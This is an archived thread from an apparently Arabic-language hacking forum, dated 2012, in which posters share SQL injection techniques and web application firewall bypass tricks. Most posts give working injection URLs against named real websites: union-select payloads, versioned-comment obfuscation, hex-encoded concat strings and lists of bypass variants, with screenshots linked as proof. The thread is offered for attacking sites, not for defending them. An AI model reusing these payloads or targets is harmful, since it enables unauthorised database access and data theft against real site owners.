:: vBspiders Professional Network :: - sql Injection Professional & many WAF Bypassing TRK

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)

- - sql Injection Professional & many WAF Bypassing TRK (http://www.vbspiders.com/vb/showthread.php?t=63662)

CODE3

07-22-2012 01:11 PM

sql Injection Professional & many WAF Bypassing TRK

بعض المشاكل في الحقن وكيف تخطيها

:: like ::

كود PHP:


		
			
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+

http://i.imgur.com/WeMOt.png

open source page : press Ctrl+f and typ 5.0

and to avoid Source Code Injection and appear info inside img in mean page

use

اقتباس:

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

اقتباس:

concat(0x273e27,version(),0x3c212d2d)

كود PHP:


		
			
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+

http://i.imgur.com/ZmC9B.png

CODE3

07-22-2012 01:18 PM

رد: sql Injection Professional & many WAF Bypassing TRK

(2)

كود PHP:


		
			
jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+

\http://i.imgur.com/iyuE4.png

no column appear in page i will use div+0 i will put it befor union select

or use one of this

اقتباس:

div+0
Having+1=0
AND+1=0
/*!and*/+1=0
and(1)=(0) x

OR false the url query

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

كود PHP:


		
			
jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+

http://i.imgur.com/JDX1K.png

:icon30::icon30:

CODE3

07-22-2012 01:26 PM

رد: sql Injection Professional & many WAF Bypassing TRK

كود PHP:


		
			
http://www.phm.ie/project.php?cat=Conservation

u can use many method to bypassing Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

كود PHP:


		
			
http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- -

and use and 1=0 to apear column nmb in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

ABO-SAGER

07-22-2012 01:49 PM

رد: sql Injection Professional & many WAF Bypassing TRK

شكراً لك بس انا وضعت شرح كيف تتخطى الحقن في السورس

الساعة الآن 07:09 AM

[ vBspiders.Com Network ]